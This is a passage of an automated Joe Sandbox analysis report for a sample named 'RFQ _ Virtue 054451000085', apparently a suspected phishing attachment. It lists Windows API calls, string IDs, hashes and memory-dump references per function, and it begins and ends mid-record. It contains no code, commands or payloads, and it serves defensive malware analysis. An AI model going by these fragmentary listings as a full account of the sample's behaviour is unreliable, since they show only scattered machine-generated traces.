                                                                                • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                • String ID:
                                                                                • API String ID: 4176008265-0
                                                                                • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                                • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                                                • _memset.LIBCMT ref: 00486FDD
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 830647256-0
                                                                                • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                                • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                                • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                                • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                                • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                                • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                                APIs
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • CoInitialize.OLE32 ref: 00478403
                                                                                • CoUninitialize.OLE32 ref: 0047840E
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                                • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                                • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                                • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 834269672-1287834457
                                                                                • Opcode ID: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
                                                                                • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                                                • Opcode Fuzzy Hash: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
                                                                                • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00475793
                                                                                • inet_addr.WSOCK32(?,?,?), ref: 004757D8
                                                                                • gethostbyname.WSOCK32(?), ref: 004757E4
                                                                                • IcmpCreateFile.IPHLPAPI ref: 004757F2
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
                                                                                • WSACleanup.WSOCK32 ref: 004758F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: 2bd1db003c0c2ad954a2c3f483633db99534e2d49977fb36df0219afc9ff4d9c
                                                                                • Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
                                                                                • Opcode Fuzzy Hash: 2bd1db003c0c2ad954a2c3f483633db99534e2d49977fb36df0219afc9ff4d9c
                                                                                • Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                                • GetLastError.KERNEL32 ref: 0046B550
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                                • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                                • GetDlgCtrlID.USER32 ref: 0045901F
                                                                                • GetParent.USER32 ref: 0045903B
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                                • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                                • GetParent.USER32(?), ref: 00459063
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1536045017-1403004172
                                                                                • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                                • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                                • GetDlgCtrlID.USER32 ref: 00459108
                                                                                • GetParent.USER32 ref: 00459124
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                                • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                                • GetParent.USER32(?), ref: 0045914C
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1536045017-1403004172
                                                                                • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                                • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                                APIs
                                                                                • GetParent.USER32 ref: 0045916F
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                                • _wcscmp.LIBCMT ref: 00459196
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1704125052-3381328864
                                                                                • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                                • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                                • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$_memset
                                                                                • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2862541840-2080382077
                                                                                • Opcode ID: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                                • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                                • Opcode Fuzzy Hash: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                                • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                                APIs
                                                                                • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumWindows
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                • API String ID: 3555792229-1603158881
                                                                                • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                                • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                  • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                  • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                  • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                                • GetDC.USER32 ref: 0043CD32
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                                • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
